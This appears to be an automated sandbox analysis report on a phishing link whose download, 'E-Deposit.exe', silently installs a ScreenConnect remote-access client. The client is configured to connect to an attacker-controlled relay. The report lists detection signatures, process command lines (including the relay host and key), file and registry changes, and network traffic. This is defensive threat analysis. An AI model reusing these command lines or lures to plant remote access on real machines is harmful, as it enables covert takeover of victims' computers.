Windows Analysis Report
https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3

Overview

General Information

Sample URL:https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcomm
Analysis ID:1584783

Detection

ScreenConnect Tool
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3012 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • rundll32.exe (PID: 348 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • svchost.exe (PID: 4092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • E-Deposit.exe (PID: 3580 cmdline: "C:\Users\user\Downloads\E-Deposit.exe" MD5: 70D47FA2E078F04400D3D1B236245678)
  • E-Deposit.exe (PID: 4136 cmdline: "C:\Users\user\Downloads\E-Deposit.exe" MD5: 70D47FA2E078F04400D3D1B236245678)
    • msiexec.exe (PID: 4524 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 5448 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2116 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 1BC1320587D07C03BB9395DF6C2ADCED C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 6468 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6898.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5269750 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7204 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9303049AB6428507101C6ED81D77CA3A MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7312 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A00F0AFBAE6A0A1DBE6AED689C5C8D07 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 4788 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 2648 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 4012 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7364 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=316b6739-92f5-44b7-a8b7-61cbbec9d115&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7484 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "84d633ef-1886-4997-bb3e-cec00c13098d" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup
Source | Rule | Description | Author | Strings
C:\Users\user\Downloads\Unconfirmed 367452.crdownload | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DFB71A7B35B829F0DC.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF9CBAF1865D94B65A.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF32625EBD992E86ED.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Config.Msi\506f30.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Source | Rule | Description | Author | Strings
0000000E.00000002.1255943146.0000000005C50000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000001B.00000000.1289665825.00000000005B2000.00000002.00000001.01000000.00000013.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000E.00000002.1258853772.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000B.00000000.1231145401.0000000000636000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000E.00000002.1247162256.0000000003301000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: ScreenConnect Client (484f9eed1d8e13b9) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 5448, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-3A73-5AC4396425A8}\(Default)
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4092, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\user\Downloads\E-Deposit.exe (copy) | ReversingLabs: Detection: 26%
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49711 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\svchost.exe | File opened: d:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\svchost.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:

Networking

Source: C:\Windows\System32\msiexec.exe | Registry value created: NULL Service
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: global traffic | DNS traffic detected: DNS query: g248jqtc.r.ap-south-1.awstrack.me
Source: global traffic | DNS traffic detected: DNS query: fub.direct
Source: global traffic | DNS traffic detected: DNS query: westcommerce.com.br
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic | DNS traffic detected: DNS query: slplegalfinance.com
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49711 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\506f2f.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI71A0.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI71C1.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7423.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\506f31.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\506f31.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Windows\Installer\wix{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vieiefum.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vieiefum.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\utizbm3q.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\utizbm3q.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cyulqgum.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cyulqgum.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\mqp0rkl4.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\mqp0rkl4.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\x0n525cd.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\x0n525cd.newcfg
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI71C1.tmp
Source: classification engine | Classification label: mal72.evad.win@42/51@13/45
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Downloads\E-Deposit.exe | File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
Source: C:\Users\user\Downloads\E-Deposit.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3012 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
